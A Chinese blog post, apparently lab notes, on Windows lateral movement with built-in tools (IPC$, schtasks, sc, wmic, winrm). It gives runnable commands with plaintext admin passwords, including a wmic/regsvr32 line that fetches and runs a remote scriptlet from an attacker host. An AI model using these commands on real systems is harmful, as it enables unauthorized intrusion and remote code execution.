内置工具横向移动

news2024/11/16 19:03:08

IPC+Schtasks

IPC:

IPC$是共享"命令管道"的资源,它是为了让进程通信而开放的命名管道,连接双方可以建立安全的通道并以此通道进行加密数据交换,从而实现对远程计算机的访问。

利用条件:

1、开放139、445

2、目标开启IPC$文件共享服务

3、需要目标机器的管理员账号和密码

常用命令:

1、连接

net use \\192.168.222.136\ipc$ /user:administrator "hjw123"

2、查看连接情况

net use

3、查看目标主机时间

net time \\192.168.222.135

 4、删除连接

net use \\192.168.222.136\ipc$ /del

5、文件上传

copy shell.txt \\192.168.222.136\c$\shell.txt        //上传文件
copy \\192.168.222.135\c$\shell.txt c:\              //下载

Schtasks:

允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任务

先查看目标时间:

net time \\192.168.222.135

创建定时任务:

SCHTASKS /Create /S 192.168.222.150 /U Administrator /P "hjw123..." /SC ONCE /ST 18:31 /TN test1 /TR C:\Users\Administrator\Desktop\mimikatz\webshell.exe /RU system

这里ip用户名密码时间路径自己修改

删除定时任务:

SCHTASKS /Delete /S 192.168.222.150 /U Administrator /P "hjw123..." /TN "test1" /F

https://www.cnblogs.com/bonelee/p/15915834.htmlhttps://www.cnblogs.com/bonelee/p/15915834.htmlSchtasks(计划任务)命令详解_一个懒鬼的博客-CSDN博客安排命令和程序定期运行或在指定时间内运行。从计划表中添加和删除任务,按需要启动和停止任务,显示和更改计划任务。若要查看该命令语法,请单击以下命令:schtasks create创建新的计划任务。MS-DOS命令语法schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month...] [/i IdleTime] [/st StartTime] [/sd Starhttps://blog.csdn.net/weixin_44657888/article/details/121192197提示:这里at已经被弃用,如果可以也可以使用at创建

IPC+SC

SC创建服务:

sc  \\192.168.222.150  create aaaa  binpath="C:\Users\Administrator\Desktop\mimikatz\webshell.exe"    obj= "Administrator"   password= "hjw123..."

sc  \\192.168.222.150  start aaaa

这里操作都以失败告终就很郁闷,这里账户名密码都是正确的

wmic:

无需上传第三方软件,利用系统内置程序,执行过程中有单模式执行和交互式执行
可以只执行命令,或者反弹shell

msf使用multi/script/web_delivery模块一条命令上线:

wmic执行:

wmic  /node:192.168.222.150  /user:Administrator  /password:hjw123...  process  call  create  "regsvr32 /s /n /u /i:http://192.168.222.128:9898/epBqui3cSu4kK.sct scrobj.dll"

这里是创建一个process去执行

回到msf上

wmic命令缺点是没有回显,可以使用wmiexec.vbs脚本回显。

WinRM

WinRM指的是windows远程管理服务,通过远程连接winRM模块可以 操作windows命令行,默认监听端口5985(HTTP)&5986(HTTPS)在2012及以后默认开启。

判断是否开启winrm服务

winrm  enumerate  winrm/config/listener

winrs执行命令:

//winrs -r:ip  -u:用户名  -p:密码   [cmd命令]
winrs  -r:http://192.168.222.150:5985  -u:Administrator  -p:hjw123... whoami

可能会出现如下问题:

 在攻击机上输入以下代码:

winrm set winrm/config/Client@{TrustedHosts="*"}

这里有一个非常有趣的效果就是后面接cmd则成功拿到对方的cmd

利用winrm参数选项中的invoke参数,来对目标对象执行特定的方法。

winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"}

命令调用了windows wmi中的win32_process类中的Create方法生成了一个calc.exe

这里也可远程执行,我们配合 winrs执行

//winrm invoke create wmicimv2/win32_process @{Commandline="执行的程序"}  -r:ip   -u:用户名  -p:密码 
winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"}   -r:http://192.168.222.150:5985  -u:Administrator  -p:hjw123...

这里可以配合前面学的定时任务、服务一起使用

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/594614.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Node.js V10.24.1 安装步骤(node、cnpm、yarn、vue)

一、下载node.js 下载地址:Download | Node.js 要下载历史低版本请点击“Previous Releases” Previous Releases 本文章以V10.24.1为例 ,下载64位msi 二、安装 下载完成后,一直点击Next直到安装完成,可以自己修改安装位置。…

09.二叉树

09.二叉树 1.树型结构 1.1概念 树是一种非线性的数据结构,它是由n(n>0)个有限结点组成一个具有层次关系的集合。把它叫做树是因为它看起来像一棵倒挂的树,也就是说它是根朝上,而叶朝下的。它具有以下的特点&…

收到字节offer,我却拒绝了...

前言: 大四快毕业了,在等待读研的期间无事可做,所以打算暑期找个实习。 忠告: 本人投了字节某测试岗,看到要求是测开的要求(科班出身需要熟悉一种语言),就以为面完发技术岗的offe…

note注解

元注解 注解在注解上面的注解称为元注解。主要有以下五种。 Retention 表明注解存活时间 Documented 将注解元素放到Javadoc文档中 Target 注解可以使用到的地方 在ElementType[]中主要有以下几种类型 TYPE:类型(比如类、注解、枚举) FIELD&…

Refresh解析

目录 后置处理器PostProcessor PostProcessor的种类 Aware 事件监听模式 Spring容器的刷新逻辑 ApplicationContext refresh的流程概述 1---prepareRefresh 2---obtainFreshBeanFactory 3---prepareBeanFactory 4---postProcessBeanFactory 5---invokeBeanFactoryPo…

【正点原子STM32连载】 第二十一章 通用定时器实验 摘自【正点原子】STM32F103 战舰开发指南V1.2

1)实验平台:正点原子stm32f103战舰开发板V4 2)平台购买地址:https://detail.tmall.com/item.htm?id609294757420 3)全套实验源码手册视频下载地址: http://www.openedv.com/thread-340252-1-1.html 第二十…

海康萤石摄像头本地局域网拉流保存

海康萤石的视频cp1型号,获取局域网的视频流:rtsp 拉流方法 首先需要在软件中打开rtsp开关,然后使用nmap工具测试下摄像头开放的端口号,一定会有一个554端口开放 $ nmap 192.168.0.105 PORT STATE SERVICE 554/tcp open r…

什么是Flink CDC,以及如何使用

什么是Flink CDC,以及如何使用 CDC介绍Flink CDC适用于场景?Flink CDC 的简单用例数据库配置创建数据库和相应的表开启mysql数据库bin-log日志1.如果是服务器2.如果在Windows使用小皮 搭建Flink CDC java环境添加maven相关pom构建Sinkmain配置运行 操作数…

盘点中国开发的有影响力的编程技术产品,道阻且长,行则将至

计算机诞生之后,程序员需要给计算机发送指令,能够准确地定义计算机所需要使用的数据,并精确地定义在不同情况下所应当采取的行动。计算机需要能够识别并执行指令。这个“指令”就是我们今天的“编程语言”,一种计算机和人都能识别…

【十】设计模式~~~结构型模式~~~享元模式(Java)

【学习难度:★★★★☆,使用频率:★☆☆☆☆】 5.1. 模式动机 面向对象技术可以很好地解决一些灵活性或可扩展性问题,但在很多情况下需要在系统中增加类和对象的个数。当对象数量太多时,将导致运行代价过高&#xff0…

路径规划算法:基于自私羊群优化的路径规划算法- 附代码

路径规划算法:基于自私羊群优化的路径规划算法- 附代码 文章目录 路径规划算法:基于自私羊群优化的路径规划算法- 附代码1.算法原理1.1 环境设定1.2 约束条件1.3 适应度函数 2.算法结果3.MATLAB代码4.参考文献 摘要:本文主要介绍利用智能优化…

图解max{X,Y}和min{X,Y}并求相关概率

图解max{X,Y}和min{X,Y}并求相关概率 对max{X,Y}或min{X,Y}进行分解再求解 P ( m a x { X , Y } ≥ c ) P [ ( X ≥ c ) ∪ ( Y ≥ c ) ] P ( m a x { X , Y } ≤ c ) P [ ( X ≤ c ) ∩ ( Y ≤ c ) ] P ( m i n { X , Y } ≥ c ) P [ ( X ≥ c ) ∩ ( Y ≥ c ) ] P ( m i…

2022年12月1日郑州大学新闻与传播学院副院长博导郑*侠—社科申报注意事项

郑老师(1项重点社科,2项青年社科), 一、选题 随时关注 最新国家层面信息:二十大报告,重要文件,重点项目信息 选题方向:问题导向 时代问题—学术问题—现实问题 题目命名&#xf…

基于微信小程序的社区生活管理

一:系统使用到的技术栈 SSMJSP原生JSMysql微信小程序 二:表结构 三:功能截图 四.源码获取

【工具学习】- Python通过dxfgrabber库获取CAD信息

Python - dxfgrabber库获取CAD信息 😄生命不息,写作不止 🔥 继续踏上学习之路,学之分享笔记 👊 总有一天我也能像各位大佬一样 🏆 一个有梦有戏的人 怒放吧德德 🌝分享学习心得,欢迎…

如何利用Stable Diffusion WebUI快速制作漫画开源

今天给大家带来的是如何利用Stable Diffusion WebUI快速制作漫画。 欢迎大家可以关注我的公众号《乔说科技》,关于如何制作动漫前置学习,请点击如下文章查看相关技术: (1)如何安装绘图工具Stable Diffusion WebUI&…

2023 手术机器人现状

先看一下主要分类: 手术机器人总览,看一下这张图: 先简单说一下国外的: 1 . 达芬奇手术机器人 简单地说,达芬奇机器人就是高级的腹腔镜系统。大家可能对现在流行的微创治疗手段如:胸腔镜、腹腔镜、妇科腔…

dubbo 3.2.0 token-有bug慎用

dubbo3 provider可以配置token dubbo: application: name: merge-provider-1 qos-enable: false protocol: name: dubbo port: 20880 registry: address: zookeeper://${zookeeper.address:192.168.157.151}:2181 provider: token: “true” 当token 配置为true的时候&#x…

Electron25集成Vue3新建多开窗口|vite4+electron窗体管理器

继上一次分享electron24vite4整合构建桌面端窗口应用。这次在此基础上分享封装多开窗口管理器ElectronVite-MultiWin。 https://blog.csdn.net/yanxinyun1990/article/details/130944508 截至目前Electron最新稳定版本到25了。 electron快速迭代更新,vite的高效构建…

dubbo 3.2.0 merge模式及 adaptive class 生成过程

MergeInvoker生成过程分析 dubbo 3.2.0 merge模式是汇聚多个group内相同服务的返回&#xff0c;核心MergeInvoker代码在public class RegistryDirectory extends DynamicDirectory 内的如下函数。 private List<Invoker<T>> toMergeInvokerList(List<Invoker&…